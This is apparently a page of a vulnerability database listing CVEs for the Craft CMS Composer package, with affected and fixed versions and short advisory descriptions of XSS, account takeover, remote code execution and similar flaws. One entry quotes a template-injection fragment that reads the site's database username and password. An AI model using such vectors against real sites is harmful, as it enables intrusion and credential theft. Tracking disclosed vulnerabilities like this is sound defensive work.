VYPR

Packagist (Composer) package

craftcms/cms

pkg:composer/craftcms/cms

Vulnerabilities (98)

  • CVE-2022-29933May 9, 2022
    affected < 3.7.36fixed 3.7.36

    Craft CMS through 3.7.36 allows a remote unauthenticated attacker, who knows at least one valid username, to reset the account's password and take over the account by providing a crafted HTTP header to the application while using the password reset functionality. Specifically, th

  • CVE-2022-28378Apr 3, 2022
    affected < 3.7.29fixed 3.7.29

    Craft CMS before 3.7.29 allows XSS.

  • CVE-2021-41824Sep 29, 2021
    affected >= 3.4.0, < 3.7.14fixed 3.7.14

    Craft CMS before 3.7.14 allows CSV injection.

  • CVE-2021-27903Jun 30, 2021
    affected < 3.6.7fixed 3.6.7

    An issue was discovered in Craft CMS before 3.6.7. In some circumstances, a potential Remote Code Execution vulnerability existed on sites that did not restrict administrative changes (if an attacker were somehow able to hijack an administrator's session).

  • CVE-2021-27902Jun 30, 2021
    affected < 3.6.0fixed 3.6.0

    An issue was discovered in Craft CMS before 3.6.0. In some circumstances, a potential XSS vulnerability existed in connection with front-end forms that accepted user uploads.

  • CVE-2021-32470May 7, 2021
    affected < 3.6.13fixed 3.6.13

    Craft CMS before 3.6.13 has an XSS vulnerability.

  • CVE-2020-19626Mar 26, 2021
    affected < 3.1.33fixed 3.1.33

    Cross Site Scripting (XSS) vulnerability in craftcms 3.1.31, allows remote attackers to inject arbitrary web script or HTML, via /admin/settings/sites/new.

  • CVE-2019-15929Oct 24, 2019
    affected < 3.1.7fixed 3.1.7

    In Craft CMS through 3.1.7, the elevated session password prompt was not being rate limited like normal login forms, leading to the possibility of a brute force attempt on them.

  • CVE-2019-17496Oct 10, 2019
    affected < 3.3.8fixed 3.3.8

    Craft CMS before 3.3.8 has stored XSS via a name field. This field is mishandled during site deletion.

  • CVE-2019-12823Jun 18, 2019
    affected < 3.1.31fixed 3.1.31

    Craft CMS before 3.1.31 does not properly filter XML feeds and thus allowing XSS.

  • CVE-2018-20465Dec 25, 2018
    affected <= 3.0.34

    Craft CMS through 3.0.34 allows remote authenticated administrators to read sensitive information via server-side template injection, as demonstrated by a {% string for craft.app.config.DB.user and craft.app.config.DB.password in the URI Format of the Site Settings, which causes

  • CVE-2018-20418Dec 24, 2018
    affected <= 3.0.25

    index.php?p=admin/actions/entries/save-entry in Craft CMS 3.0.25 allows XSS by saving a new title from the console tab.

  • CVE-2018-3814Jan 1, 2018
    affected <= 2.6.3000

    Craft CMS 2.6.3000 allows remote attackers to execute arbitrary PHP code by using the "Assets->Upload files" screen and then the "Replace it" option, because this allows a .jpg file to have embedded PHP code, and then be renamed to a .php extension.

  • CVE-2017-9516MedJun 8, 2017
    affected < 2.6.2982fixed 2.6.2982

    Craft CMS before 2.6.2982 allows for a potential XSS attack vector by uploading a malicious SVG file.

  • CVE-2017-8385MedMay 1, 2017
    affected < 2.6.2976fixed 2.6.2976

    Craft CMS before 2.6.2976 does not prevent modification of the URL in a forgot-password email message.

  • CVE-2017-8384MedMay 1, 2017
    affected < 2.6.2976fixed 2.6.2976

    Craft CMS before 2.6.2976 allows XSS attacks because an array returned by HttpRequestService::getSegments() and getActionSegments() need not be zero-based. NOTE: this vulnerability exists because of an incomplete fix for CVE-2017-8052.

  • CVE-2017-8383MedMay 1, 2017
    affected < 2.6.2976fixed 2.6.2976

    Craft CMS before 2.6.2976 does not properly restrict viewing the contents of files in the craft/app/ folder.

  • CVE-2017-8052MedApr 22, 2017
    affected < 2.6.2974fixed 2.6.2974

    Craft CMS before 2.6.2974 allows XSS attacks.

Page 5 of 5